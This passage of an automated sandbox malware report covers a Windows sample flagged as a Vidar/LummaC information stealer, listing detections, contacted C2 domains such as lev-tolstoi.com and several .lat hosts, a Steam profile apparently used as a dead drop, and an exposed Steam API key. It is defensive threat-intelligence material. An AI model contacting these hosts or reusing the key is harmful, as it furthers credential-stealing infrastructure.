              DLL Side-Loading
              Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              file.exe63%ReversingLabsWin32.Trojan.Vidar
              file.exe100%AviraHEUR/AGEN.1306956
              file.exe100%Joe Sandbox ML
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
              SourceDetectionScannerLabelLink
              https://lev-tolstoi.com/x100%Avira URL Cloudmalware
              https://lev-tolstoi.com/apiyp100%Avira URL Cloudmalware
              https://lev-tolstoi.com:443/apiocal100%Avira URL Cloudmalware
              enterwahsh.biz100%Avira URL Cloudmalware
              https://lev-tolstoi.com/apix100%Avira URL Cloudmalware
              https://lev-tolstoi.com/api$100%Avira URL Cloudmalware
              https://lev-tolstoi.com/apiC100%Avira URL Cloudmalware
              https://lev-tolstoi.com/B100%Avira URL Cloudmalware
              https://lev-tolstoi.com/ws100%Avira URL Cloudmalware
              https://lev-tolstoi.com/apisy100%Avira URL Cloudmalware
              NameIPActiveMaliciousAntivirus DetectionReputation
              steamcommunity.com
              104.102.49.254
              truefalse
                high
                lev-tolstoi.com
                172.67.157.254
                truefalse
                  high
                  enterwahsh.biz
                  unknown
                  unknowntrue
                    unknown
                    wordyfindy.lat
                    unknown
                    unknownfalse
                      high
                      slipperyloo.lat
                      unknown
                      unknownfalse
                        high
                        curverpluch.lat
                        unknown
                        unknownfalse
                          high
                          tentabatte.lat
                          unknown
                          unknownfalse
                            high
                            manyrestro.lat
                            unknown
                            unknownfalse
                              high
                              bashfulacid.lat
                              unknown
                              unknownfalse
                                high
                                shapestickyr.lat
                                unknown
                                unknownfalse
                                  high
                                  talkynicer.lat
                                  unknown
                                  unknownfalse
                                    high
                                    NameMaliciousAntivirus DetectionReputation
                                    slipperyloo.latfalse
                                      high
                                      https://steamcommunity.com/profiles/76561199724331900false
                                        high
                                        https://lev-tolstoi.com/apifalse
                                          high
                                          enterwahsh.biztrue
                                          • Avira URL Cloud: malware
                                          unknown
                                          curverpluch.latfalse
                                            high
                                            tentabatte.latfalse
                                              high
                                              manyrestro.latfalse
                                                high
                                                bashfulacid.latfalse
                                                  high
                                                  wordyfindy.latfalse
                                                    high
                                                    shapestickyr.latfalse
                                                      high
                                                      talkynicer.latfalse
                                                        high
                                                        NameSourceMaliciousAntivirus DetectionReputation
                                                        https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.pngfile.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          high
                                                          https://duckduckgo.com/chrome_newtabfile.exe, 00000000.00000003.1286881258.0000000002E4F000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1286959057.0000000002E38000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            https://duckduckgo.com/ac/?q=file.exe, 00000000.00000003.1286881258.0000000002E4F000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1286959057.0000000002E38000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              https://lev-tolstoi.com/xfile.exe, 00000000.00000002.1608460222.0000000000771000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: malware
                                                              unknown
                                                              https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&ampfile.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                high
                                                                https://lev-tolstoi.com:443/apiocalfile.exe, 00000000.00000002.1608203623.0000000000703000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: malware
                                                                unknown
                                                                https://steamcommunity.com/?subsection=broadcastsfile.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://lev-tolstoi.com/sfile.exe, 00000000.00000002.1608203623.000000000072B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://lev-tolstoi.com/apiypfile.exe, 00000000.00000002.1608460222.0000000000771000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1362882814.000000000076F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: malware
                                                                    unknown
                                                                    https://store.steampowered.com/subscriber_agreement/file.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      high
                                                                      http://www.valvesoftware.com/legal.htmfile.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&l=enfile.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedbackfile.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6file.exe, 00000000.00000003.1274773836.00000000006E5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://lev-tolstoi.com/api$file.exe, 00000000.00000002.1608460222.0000000000771000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1362882814.000000000076F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: malware
                                                                              unknown
                                                                              https://steamcommunity.com/profiles/76561199724331900yfile.exe, 00000000.00000003.1274773836.00000000006EC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1608203623.00000000006EC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=englfile.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&l=englisfile.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbCfile.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=FRRifile.exe, 00000000.00000003.1274773836.00000000006E5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1file.exe, 00000000.00000003.1274773836.00000000006E5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english&file.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&l=enfile.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://lev-tolstoi.com/file.exe, 00000000.00000003.1274773836.000000000072E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1608203623.000000000072B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1608460222.0000000000771000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1362882814.000000000076F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                http://store.steampowered.com/privacy_agreement/file.exe, 00000000.00000003.1274773836.00000000006E5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://steamcommunity.com:443/profiles/76561199724331900file.exe, 00000000.00000003.1274773836.0000000000703000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    https://store.steampowered.com/points/shop/file.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=file.exe, 00000000.00000003.1286881258.0000000002E4F000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1286959057.0000000002E38000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        http://crl.rootca1.amazontrust.com/rootca1.crl0file.exe, 00000000.00000003.1315384897.0000000002E4F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          http://ocsp.rootca1.amazontrust.com0:file.exe, 00000000.00000003.1315384897.0000000002E4F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=english&afile.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              https://www.ecosia.org/newtab/file.exe, 00000000.00000003.1286881258.0000000002E4F000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1286959057.0000000002E38000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                https://steamcommunity.com/profiles/76561199724331900/inventory/file.exe, 00000000.00000003.1274773836.00000000006E5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brfile.exe, 00000000.00000003.1316403047.0000000002F40000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    https://store.steampowered.com/privacy_agreement/file.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&l=engfile.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&amfile.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          https://store.steampowered.com/about/file.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            https://steamcommunity.com/my/wishlist/file.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&file.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                https://help.steampowered.com/en/file.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  https://steamcommunity.com/market/file.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    https://store.steampowered.com/news/file.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=file.exe, 00000000.00000003.1286881258.0000000002E4F000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1286959057.0000000002E38000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        http://store.steampowered.com/subscriber_agreement/file.exe, 00000000.00000003.1274773836.00000000006E5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.orgfile.exe, 00000000.00000003.1274773836.00000000006E5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            https://lev-tolstoi.com/apixfile.exe, 00000000.00000003.1274944265.000000000073A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1274773836.000000000072E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                            unknown
                                                                                                                                            https://steamcommunity.com/discussions/file.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              https://store.steampowered.com/stats/file.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&amfile.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.pngfile.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&afile.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      https://store.steampowered.com/steam_refunds/file.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        http://x1.c.lencr.org/0file.exe, 00000000.00000003.1315384897.0000000002E4F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          http://x1.i.lencr.org/0file.exe, 00000000.00000003.1315384897.0000000002E4F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchfile.exe, 00000000.00000003.1286881258.0000000002E4F000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1286959057.0000000002E38000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=Lj6X7NKUMfzk&afile.exe, 00000000.00000003.1274773836.00000000006E5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                high
                                                                                                                                                                https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900file.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  high
                                                                                                                                                                  https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016file.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    high
                                                                                                                                                                    https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&l=efile.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                      high
                                                                                                                                                                      https://steamcommunity.com/workshop/file.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        high
                                                                                                                                                                        https://support.mozilla.org/products/firefoxgro.allfile.exe, 00000000.00000003.1316403047.0000000002F40000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                          high
                                                                                                                                                                          https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&l=english&_cfile.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            high
                                                                                                                                                                            https://store.steampowered.com/legal/file.exe, 00000000.00000003.1274773836.00000000006E5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              high
                                                                                                                                                                              https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=enfile.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                high
                                                                                                                                                                                https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l=engfile.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  https://www.google.com/images/branding/product/ico/googleg_lodp.icofile.exe, 00000000.00000003.1286881258.0000000002E4F000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1286959057.0000000002E38000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6v03mWpAc&l=english&afile.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                      high
                                                                                                                                                                                      https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&l=englfile.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                        high
                                                                                                                                                                                        https://lev-tolstoi.com/apiCfile.exe, 00000000.00000003.1329889525.0000000000783000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1329634294.0000000000783000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1329734149.0000000000783000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1315198830.000000000077E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1315667210.000000000077E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                        • Avira URL Cloud: malware
                                                                                                                                                                                        unknown
                                                                                                                                                                                        http://upx.sf.netAmcache.hve.10.drfalse
                                                                                                                                                                                          high
                                                                                                                                                                                          https://store.steampowered.com/file.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                            high
                                                                                                                                                                                            https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=oOCAGrkRfpQ6&l=efile.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                              high
                                                                                                                                                                                              https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.pngfile.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                high
                                                                                                                                                                                                https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpgfile.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  high
                                                                                                                                                                                                  https://lev-tolstoi.com/Bfile.exe, 00000000.00000003.1315198830.000000000077E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1315667210.000000000077E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  • Avira URL Cloud: malware
                                                                                                                                                                                                  unknown
                                                                                                                                                                                                  https://community.fastly.steamstatic.com/public/images/skin_1/arrowDn9x5.giffile.exe, 00000000.00000003.1274773836.00000000006E5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    high
                                                                                                                                                                                                    https://lev-tolstoi.com/apisyfile.exe, 00000000.00000002.1608460222.0000000000771000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1362882814.000000000076F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    • Avira URL Cloud: malware
                                                                                                                                                                                                    unknown
                                                                                                                                                                                                    https://lev-tolstoi.com/wsfile.exe, 00000000.00000002.1608203623.000000000072B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    • Avira URL Cloud: malware
                                                                                                                                                                                                    unknown
                                                                                                                                                                                                    https://ac.ecosia.org/autocomplete?q=file.exe, 00000000.00000003.1286881258.0000000002E4F000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1286959057.0000000002E38000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      high
                                                                                                                                                                                                      https://lev-tolstoi.com:443/apifile.exe, 00000000.00000002.1608203623.0000000000703000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1274773836.0000000000703000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        high
                                                                                                                                                                                                        https://community.fastly.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=tvQfile.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          high
                                                                                                                                                                                                          http://crt.rootca1.amazontrust.com/rootca1.cer0?file.exe, 00000000.00000003.1315384897.0000000002E4F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            high
                                                                                                                                                                                                            https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S&ampfile.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              high
                                                                                                                                                                                                              http://store.steampowered.com/account/cookiepreferences/file.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                high
                                                                                                                                                                                                                https://store.steampowered.com/mobilefile.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  high
                                                                                                                                                                                                                  https://steamcommunity.com/file.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1274773836.00000000006EC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1608203623.00000000006EC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    high
                                                                                                                                                                                                                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=file.exe, 00000000.00000003.1286881258.0000000002E4F000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1286959057.0000000002E38000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                      high
                                                                                                                                                                                                                      https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=_92TWn81file.exe, 00000000.00000003.1274773836.00000000006E5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                        high
                                                                                                                                                                                                                        • No. of IPs < 25%
                                                                                                                                                                                                                        • 25% < No. of IPs < 50%
                                                                                                                                                                                                                        • 50% < No. of IPs < 75%
                                                                                                                                                                                                                        • 75% < No. of IPs
                                                                                                                                                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                        172.67.157.254
                                                                                                                                                                                                                        lev-tolstoi.comUnited States
                                                                                                                                                                                                                        13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                        104.102.49.254
                                                                                                                                                                                                                        steamcommunity.comUnited States
                                                                                                                                                                                                                        16625AKAMAI-ASUSfalse
                                                                                                                                                                                                                        Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                                        Analysis ID:1583463
                                                                                                                                                                                                                        Start date and time:2025-01-02 20:15:42 +01:00
                                                                                                                                                                                                                        Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                        Overall analysis duration:0h 6m 9s
                                                                                                                                                                                                                        Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                        Report type:full
                                                                                                                                                                                                                        Cookbook file name:default.jbs
                                                                                                                                                                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                        Number of analysed new started processes analysed:17
                                                                                                                                                                                                                        Number of new started drivers analysed:0
                                                                                                                                                                                                                        Number of existing processes analysed:0
                                                                                                                                                                                                                        Number of existing drivers analysed:0
                                                                                                                                                                                                                        Number of injected processes analysed:0
                                                                                                                                                                                                                        Technologies:
                                                                                                                                                                                                                        • HCA enabled
                                                                                                                                                                                                                        • EGA enabled
                                                                                                                                                                                                                        • AMSI enabled
                                                                                                                                                                                                                        Analysis Mode:default
                                                                                                                                                                                                                        Analysis stop reason:Timeout
                                                                                                                                                                                                                        Sample name:file.exe
                                                                                                                                                                                                                        Detection:MAL
                                                                                                                                                                                                                        Classification:mal100.troj.spyw.evad.winEXE@2/5@12/2
                                                                                                                                                                                                                        EGA Information:
                                                                                                                                                                                                                        • Successful, ratio: 100%
                                                                                                                                                                                                                        HCA Information:
                                                                                                                                                                                                                        • Successful, ratio: 96%
                                                                                                                                                                                                                        • Number of executed functions: 35
                                                                                                                                                                                                                        • Number of non-executed functions: 64
                                                                                                                                                                                                                        Cookbook Comments:
                                                                                                                                                                                                                        • Found application associated with file extension: .exe
                                                                                                                                                                                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
                                                                                                                                                                                                                        • Excluded IPs from analysis (whitelisted): 20.42.65.92, 13.107.246.45, 40.126.31.69, 4.245.163.56
                                                                                                                                                                                                                        • Excluded domains from analysis (whitelisted): onedsblobprdeus17.eastus.cloudapp.azure.com, otelrules.azureedge.net, login.live.com, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                        • VT rate limit hit for: file.exe
                                                                                                                                                                                                                        TimeTypeDescription
                                                                                                                                                                                                                        14:16:35API Interceptor9x Sleep call for process: file.exe modified
                                                                                                                                                                                                                        15:30:19API Interceptor1x Sleep call for process: WerFault.exe modified
                                                                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                        172.67.157.254176.113.115.170.ps1Get hashmaliciousLummaCBrowse
                                                                                                                                                                                                                          KRNL.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                            Gz1bBIg2Tw.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                              EdYEXasNiR.exeGet hashmaliciousLummaC, Amadey, Babadeda, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                Exlan_setup_v3.1.2.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                  GPU-Z.exeGet hashmaliciousLummaC, DarkTortilla, LummaC StealerBrowse
                                                                                                                                                                                                                                    Loader.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                      MPgkx6bQIQ.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                        l0zocrLiVW.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                          XYQ1pqHNiT.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                            104.102.49.254r4xiHKy8aM.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                                                                                                                                                                            • /ISteamUser/GetFriendList/v1/?key=AE2AE4DBF33A541E83BC08989DB1F397&steamid=76561198400860497
                                                                                                                                                                                                                                            http://gtm-cn-j4g3qqvf603.steamproxy1.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            • www.valvesoftware.com/legal.htm
                                                                                                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                            lev-tolstoi.com176.113.115.170.ps1Get hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                            • 172.67.157.254
                                                                                                                                                                                                                                            KRNL.exeGet hashmaliciousLummaCBrowse
